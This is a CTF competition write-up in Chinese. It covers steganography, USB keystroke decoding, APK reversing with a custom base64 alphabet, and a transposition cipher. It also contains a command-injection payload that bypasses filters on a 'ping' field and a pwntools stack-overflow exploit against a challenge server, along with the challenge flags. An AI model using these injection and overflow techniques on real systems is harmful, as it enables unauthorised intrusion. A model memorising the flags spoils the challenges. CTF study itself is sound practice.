网络威胁数据联盟暑期班CTF WP

hidehight

利用binwalk获取隐藏文件

弱口令：1234打开zip得到logo1.png.

再windows下用winhex

最终得到

easyusb

得到一份记录usb的流量记录, 利用tshark提取流量:

tshark -T json -r usb.pcapng > usb.json

提取后grep筛选出usb.hid的值, 并构造脚本分析:

# -*- coding:utf-8 -*-

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('usb.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass
keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :' + "".join(output))

得到

发现密码错误, 尝试字母大写密码正确, 得到flag: hillstone{46f2fbee-3130-4af5-857e-981ad422160f}

java_app

拿到题目是一个Android的apk, 于是用Jeb打开看伪代码:

发现一个判断用户名密码的逻辑以及一个check()方法, 查看check方法看到字母表, 疑似是base64, 于是将password经过check()处理的字符串“yGlszHNUzWZl2UIU0W8WNFdSMXBsNGNl/V5hwmRlI6FTyD5u0UgRL+FZ+/U”和字母表进行base64解密, 得到flag: hillstone{B4se64_r3pl4ce_Table!!sh4nsH1-ayY}

置换密码

text = 'ilhstlneoTR{N5A05PT11NC0PH1R}3'

key = [3,1,2]

li0 = []
li1 = []
li2 = []
for i in range(0,len(text)):
    if i % 3 == 0:
        li0.append(text[i])
    elif (i - 1) % 3 == 0:
        li1.append(text[i])
    elif (i - 2) % 3 == 0:
        li2.append(text[i])
li = []
for i in range(len(li1)): 
    li.append(li1[i]) 
    li.append(li2[i])
    li.append(li0[i])

# print(li)
print("The ciphered text is :")
ciphered_txt = (''.join(li))
print(ciphered_txt)

#ilhstlneoTR{N5A05PT11NC0PH1R}3

发现是将密码3个3个分组然后将最后一位移到最前面，直接手动分组移动

hillstone{TRAN5P051T10NC1PH3R}

ping

命令执行漏洞尝试使用分号绕过

127.0.0.1;ls

成功回显index.php和flag.php

尝试cat flag.php，发现ban了空格使用$IFS绕，过滤了flag和通配符，使用反引号绕过

?ip=127.0.0.1;cat$IFS$9`find$IFS$9.`

easystack（new）

ida64查看附件, 发现vul()受害函数, 于是继续看, 发现gets(&v1)存在栈溢出, 溢出大小为68, 构造exp得到flag:

from pwn import *
p=remote("81.70.89.91",57001)
backdoor=0x400729
pay='a'*0x68+p64(backdoor)
p.recvuntil("hello!!!please give me your name\n")
p.sendline(pay)
p.interactive()